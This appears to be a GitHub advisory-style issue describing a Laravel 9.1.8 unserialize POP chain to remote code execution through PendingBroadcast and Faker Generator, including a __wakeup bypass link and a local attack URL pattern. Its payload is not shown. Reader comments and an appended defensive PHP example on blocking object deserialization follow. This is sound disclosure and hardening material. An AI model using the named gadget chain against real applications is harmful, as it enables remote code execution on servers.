Laravel 9.1.8 POP chain3 #3
Comments
@1nhann Thank you for sharing this POP chain. Similar to Laravel/RCE1 but your trick (
Yes, it is based on Laravel/RCE1, and what I did is just bypassing the __wakeup
Can somebody tell me where I can find documentation on POP chain attacks like this one?
Is this the same POP chain vuln that is only an issue if you pass unserialized user input directly into the function then?
Hello @jwjenkin, All POP chains are security issues if we pass untrusted user input to the PHP<8 has no active support and only receives security updates. PHP versions
Laravel 9.1.8 POP chain3
Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in (1) `__destruct` in `Illuminate\Broadcasting\PendingBroadcast.php`. (2) `__call` in `Faker\Generator.php`. This poc bypasses `__wakeup` in `Faker\Generator.php`: https://inhann.top/2022/05/17/bypass_wakeup/

build a route to test:

`routes/web.php`:

poc
result :
attack
http://127.0.0.1/?ser=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
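
The defensive side of the point raised in the comments (a POP chain only matters when untrusted input reaches `unserialize`), as an added example that is not code from this issue or from Laravel. `DemoGadget`, the `$ser` value, `signPayload` and `verifyPayload` are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for a gadget class; not a Laravel or Faker class.
final class DemoGadget
{
    public static array $log = [];
    public string $note = '';

    public function __destruct()
    {
        // A magic method like this is the entry point a chain starts from.
        self::$log[] = "destructor ran with note={$this->note}";
    }
}

// Constructed value standing in for the `ser` request parameter.
$ser = 'O:10:"DemoGadget":1:{s:4:"note";s:12:"from request";}';

// Weak: the class is instantiated, so __destruct fires when $v is released.
$v = unserialize($ser);
unset($v);
printf("plain unserialize: %d destructor call(s)\n", count(DemoGadget::$log));

// Hardened (a): no class from the input is instantiated; $v is inert.
$v = unserialize($ser, ['allowed_classes' => false]);
printf("allowed_classes=false yields %s\n", get_class($v));
unset($v);
printf("destructor calls now: %d\n", count(DemoGadget::$log));

// Hardened (b): accept only HMAC-signed JSON, which cannot create objects.
function signPayload(array $data, string $key): string
{
    $body = base64_encode(json_encode($data, JSON_THROW_ON_ERROR));
    return $body . '.' . hash_hmac('sha256', $body, $key);
}

function verifyPayload(string $token, string $key): ?array
{
    [$body, $mac] = array_pad(explode('.', $token, 2), 2, '');
    if (!hash_equals(hash_hmac('sha256', $body, $key), $mac)) {
        return null; // unsigned or tampered input is rejected before parsing
    }
    return json_decode(base64_decode($body, true), true, 16, JSON_THROW_ON_ERROR);
}

$key = random_bytes(32); // demo key; a real app loads it from configuration
var_dump(verifyPayload(signPayload(['user' => 42], $key), $key));
var_dump(verifyPayload($ser, $key));
```

With `allowed_classes` set to `false`, the input deserializes to `__PHP_Incomplete_Class`, so no destructor or other magic method of an application class runs on it.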